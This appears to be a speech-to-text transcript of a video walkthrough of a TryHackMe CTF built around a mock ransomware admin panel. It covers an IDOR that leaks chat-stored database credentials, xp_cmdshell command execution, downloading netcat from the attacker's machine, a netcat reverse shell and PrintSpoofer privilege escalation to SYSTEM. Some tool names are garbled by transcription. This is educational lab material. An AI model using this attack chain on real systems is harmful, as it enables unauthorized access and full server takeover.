Let's go ahead and create an account on the platform and see what we can get. I'm gonna call my user Ictos, and then I'm just gonna use a random password like 1234 and then to sign up. Don't save, and it looks like we're in. It says welcome and my username, and then we have a list of my previous chats, and it seems like we can send a message to someone, and it says you can message the admin to discuss affiliate opportunities and ask any questions about our ransomware as a service platform. So we have the option to send a message to the admin. Let's just say, hey admin. Let's see what we get. Great, it looks like our message is sent, but we're not really getting a reply, and I don't think we're gonna get a reply from any admin. Taking a closer look into this webpage will reveal something very interesting. Can you guys see it? Our chat that was just created has an ID, and we can see it in the URL as a parameter over here. This could indicate a possible IDOR vulnerability in how the chats are handled and shown. Let's try to play around with this chat parameter and see if we can get it to show us previous chats. So I'm gonna remove that and then start from 1. It says chat not found. Let's try to increase it every time. And let's see if we get anything. And perfect! We managed to load a chat between another affiliate and the admin. You can see the previous affiliate said, hello, I'm interested. The admin replied, hey there, what's your company size? And the affiliate replied. But looks like the admin never got back to him. Let's proceed with the other chats and see if we can get anything useful out of them. So I'm gonna continue increasing the ID to see if we can get more chats. Here's another one. Now this one looks promising. It's a chat between admin 1 and admin 2. Let's read it and see what's going on here. Admin 2 says, yo bro, I'm in Bali right now and I forgot my disk. Admin 2 says, is there any chance you can get me the DB creds? I need access ASAP. Admin 1 actually says to admin 2 that this is not the best way to communicate, and looks like he shared the credentials to the database, which is CTF user, and the password is very strong password 123 exclamation mark. Admin also pointed out that they should delete this chat afterwards so that there are no logs of the credentials. And admin 2 says that you're a lifesaver, and did we end up patching that XPCMD cell thing? Remember this name, we're gonna get back to it in a bit. Now that we have access to the database credentials, let's see how we can try to use them. I already know the IP address of my target, so let's start exploring the target server for vulnerabilities. I'm gonna head to my terminal and run my favorite command, which is nmap-sc -sv -a capital PN, and then it's going to be followed by the IP address of my target. -sc is for default scripts, -sv enables version detection, -a means aggressive scan, which also enables OS detection, and -pn is saying to nmap, hey, don't check if this machine is up or not. So let's run it and see what we get. Looks like port 22 for SSH is open, port 80 for Apache for the web server that we just accessed, Then we have port 1433 for Microsoft SQL Server, and then port 5357 for the Microsoft HTTP API. So we have a Windows target over here, and we can actually try to connect to the Microsoft SQL Server with the credentials that we just got. We're gonna use a tool called MSSQL Client, which is part of the InPacket family and installed on all Kali instances to connect to the MSSQL server. To find the full path of the MSSQL tool, we can just do locate MSSQL client, and then you'll see that there are two versions of it. I'm actually gonna use this Python version over here. So I'm gonna right click and copy the full path to the tool, and then write Python 3, paste down the full path, and now we can begin constructing our command. We're gonna say workgroup /ctf user, which is the username that we just got from our admin friend on the leaked chat. Then we're gonna have to paste down the password that we just got from here. So I'm gonna copy that and paste it down over here. Then continue with the IP address of our target, which is 192.168.178 and 243 in my case, but in your case, it's whatever TryHackMe says. And then I'm simply gonna say that the port to connect to is 1433. So let me zoom out a little bit so that you can see better. This is our full command. So again, we're actually running the MSSQL client tool, which is part of the InPacket family. Then we're saying workgroup. Workgroup is basically just the domain, the default domain for our Windows target. Then CTF user is just the username that we got from our admin friend. And then we follow it by the password that we just got. So let's press enter on that and see what we get. As you can see, we actually got a connection to the database. What I always like to check in Microsoft SQL servers is to check if the XP-CMD cell permissions are not set up properly. And like our admin2 friend already mentioned here, it looks like the XP-CMD cell permissions might actually not be configured properly. XP-CMD cell executes system commands from within the DBMS. So to do that, all we have to do is to do enable XP-CMD cell, and let's see what we get. And perfect, it looks like the configuration option for XP-CMD cell changed from 1 to 1. So XP-CMD cell is already enabled here. Sweet, now we can run system commands on the target machine and try to gain a reverse shell. The way I like to go about this is to upload a netcat binary to the target server and from there initiate a reverse shell. For those who don't know, netcat is primarily used by hackers to listen for incoming connections on specific ports or to initiate connections on specific ports. In this case, we want to set up a listener on our own Kali machine and then run the netcat binary on our target server to connect back to our Kali machine, just like a simple reverse shell. Let me split my screen here and show you what I mean. And now the first thing we have to do is to locate the netcat binary, which can also be found inside all Kali distros as well. We can run the command locate nc.exe and you'll see that we have the path over here as user share Windows resources, binaries and nc.exe. So let's copy that and let's paste it right here. Now if I do ls, you'll see that we have nc.txt over here. So let me clear my screen. Now I think the easiest way to transfer files between our Kali machine and the target server is to do it with an HTTP server from Python. So we're actually just gonna use Python as a file server to move files to the target server. To do that, all we have to do is to run python 3-m http.server, and that will start an HTTP server on port 8000. So all the files that are inside our current directory are accessible to whoever is trying to access them through HTTP, our IP, and on port 8000. We can now go back to the MS SQL client and run the following command to download the netcat binary. We have to do xp cmdcell PowerShell wget http. Then we have to find the IP address of our Kali machine. So to do that, I can just run ifconfig, and here is the IP address for my Kali machine. I'm gonna paste that right there. Then we have to say that I want you to connect to port 8000 and access the file called nc.exe and save this file inside the following directory. So we want to put it inside users public nc.exe. That way we know that we can actually save the file inside a directory that's accessible to anyone. So this command will actually download the nc.exe file that is currently hosted on our HTTP server over here. And now if I press enter, you'll see that we will get a download request from here. As you can see, we got a GET request for the nc.exe file and the response was 200, which means everything went fine. I'm gonna open a new tab over here, and now I'm gonna run a listener on our Kali machine to listen on port 4444 using netcat to listen for the incoming connections. I'm gonna do that by running the command nc-lvnp4444 and press enter on that, and now we're listening on incoming connections on port 4444. Now if we go back, we can try to initiate the reversal from the target server with the following command. Again, we're gonna call xp-cmdcell, and this time we want to access the binary that we just saved on our target server, which was inside users public nc.exe, and now we're gonna say to netcat to connect to our Kali machine. To do that, we have to copy our IP address, paste it over here, say to connect to port 4444, and then have the last parameter, which is -e cmd.exe, and close the quotes. Here we're simply calling xp-cmdcell again and accessing the nc.exe binary that we just installed, telling it to connect to our Kali machine on port 4444 and to route all input to cmd.exe so our commands get executed. Now if we press enter and go back to our new tab, you'll see that we actually got a cell on the Kali listener. We now have a reversal to the target server. We can run commands like who am I in a fully interactive cell. So this is perfect. Now that we have initial access to the machine, we can start looking for ways to perform privilege escalation and become the admin in order to find the decryption script and the password for our flag. As you can see from the result of the whenmy command, it suggests that we have access to a service account. Service accounts are known for having misconfigured permissions and privileges on Windows servers, often allowing for easy privilege escalation. To check our privileges, we can simply run whoami/priv and read the result. So this is a pretty interesting result. As you can see over here, we have a very special privilege enabled called SC impersonate privilege, which allows us to impersonate other users on our local system. This also includes administrators. There are many tools out there that help us exploit this misconfiguration and end up with a privilege escalation. For our example, we're gonna use the print spoofer tool to exploit the impersonation privileges. You can find the link to the tool in the video description. I already have print spoofer installed and already located inside my current directory, but all you have to do is to press the download button here and save the file somewhere you can access it. Like I said, if I go back to my terminal and open a new tab, let me zoom in a bit, and if I do ls, you'll see that I actually have the printspoofer.exe file already downloaded inside my current directory. This file is supposed to be run inside the target Windows machine like we did before with nc.exe. So the process is very similar. We're gonna have to download the file and then run it from our target server. So let's do just that. Print spoofer is already inside the directory where the HTTP server is currently running. So all we have to do is to go back to our cell and run the partial wget command that we ran before, but this time instead of accessing nc.exe, we're gonna access printspoofer.exe. So let's do just that. I'm gonna run PowerShell wget http followed by the IP address of my Kali machine. Let me copy that and paste it right here. On port 8000, we're accessing printspoofer this time .exe, and we want to save the file inside C users public, and then I'm gonna call it ps.exe for short. So let's execute that. Let's go back to our HTTP server, and as you can see, we got another GET request for print spoofer, and the result was 200, which means everything went okay. And the command here finished executing. Now that we have the tool uploaded to our target server, we can use it to elevate our privileges. The best way we can use this tool is to launch another reverse shell to our Kali machine, but this time have it run as the NT authority system user, which grants us access to everything on the server. To do that, we'll need to open a new tab and start another listener on port 4443 and then initiate the connection from the target server again. So let's go back to our new terminal, clear the screen, and run nc-lvnp 4443. So I simply change the last 4 to 3. And again, this command will just listen for the incoming connections on this specified port. So let's press enter on that, and now we're listening. Now we need to initiate the connection from the target server again. To do that, we'll need to go back to our cell and then run the following command. We're accessing the tool that we just stored inside the server, which is located under users public ps.exe -i-c, and then in quotes we're gonna enter the command we want to run as the anti-authority system user, which is an administrative account. Whatever is inside the brackets will be executed by the anti-authority system user. And all we want to do is to initiate another netcat reverse shell. We can use the same command as before, but slightly change it a bit. Instead of connecting to port 4444, we want to connect to port 4443. So let's do just that. We're gonna execute the netcat file that we just stored under users public nc.exe, followed by the IP address of our Kali machine. Let me copy it again and then paste it right here. And now we want to connect to port 4443. And again, we want to route all input to cmd.exe. Close the quotes and our command is ready. If everything goes well, we're gonna get another cell, but this time as the anti-authority system user. This will run the print spoofer tool and it will tell it to run the command in the brackets like I said before. The command in the brackets is simply going to initiate another reverse shell on port 4443. So let's run it and see what we get. Looks like I have a typo. It's not user, it's users. So let me write that again. And now let's run it again. Looks like the print spoofer tool executed correctly, and if we go back to our other listener, we'll see that we just got another cell. Now what happens if we enter who am I again? As you can see, we are the anti-authority system user, which means we successfully performed privilege escalation on our target server. We can now proceed and try to find the decryption script and the password. We need those to decrypt the flag that we just downloaded. We can find those files under the administrator user desktop, so let's navigate to that location and see what we get. We just need to go to C, users, administrator, and then desktop. Now if we do dir to list the files that are inside this current directory, we'll see that we have decrypt.py and password.txt. So perfect, here they are. To view the contents of this txt file, we can simply run the type command followed by the name of the file. And we can see the contents of the decryption script. So let me copy that over here. Open a new tab and save it inside the file called decrypt.py. I'm gonna save it, and now we can also view the password inside the password.txt file. And the password is, this is the password you worked hard for, with a little smile face at the end. We can now copy that, and we are done with the target machine. Let's move to a new terminal and run the decryption script. So we have the script stored as decrypt.py, so let's run it with Python 3 and see what we get. it says enter the file path to decrypt. We actually want to decrypt the flag file, and to do that, we need to enter the full path to the file. Let me open a new tab over here to try and find the file. So I'm gonna cd inside home/parallels, then inside downloads, and if I do ls, we'll see that the flag file is over here and that's its full name. So let me copy that and write down the full path to the file, which is home parallels / downloads followed by the name of the file. And now we have to enter the password. Let's go back to our terminal and copy the password that we got from password.txt. I'm gonna paste that right here. And it says that our flag has been decrypted successfully. Now if I do ls again, we'll see that we have another file called flag.txt.dec, which is a decrypted format. So let me cut this exact file to view the contents. And there we go. Here is our flag, which says ransomware is bad for you. So let's copy that, go back to TryHackMe, and we can paste it down over here and submit. And there we go. We just completed the devsecurity anniversary CTF. The CTF was originally part of a competition we held back in September 2024 to celebrate the anniversary of our Discord server. I was responsible for setting up and running the CTF, and I really want to point out that it is heavily inspired by a talk given by Evangelis Stikas at DEFCON 32 about hacking ransomware groups. So the CTF depicts a real-life scenario that actually happened. We used TryHackMe to host the CTF, but we are not going to go over how to connect to their virtual networks and access the target machine. Please refer to the video description if you're not familiar with this procedure. In the CTF, we are actually given the flag, but it is encrypted. Our goal in this CTF is to find a decryptor script and a password to decrypt the flag file that is given to us from the start. As you can see in the challenge overview, it says that we have access to the flag, which is encrypted. Then our mission is to gain administrative access to the target server, find the decryptor script and the password, and then decrypt the flag. What you want to do is to actually go into the second task here and start the machine. Once you press start here, the IP of the machine will appear somewhere around here and you can start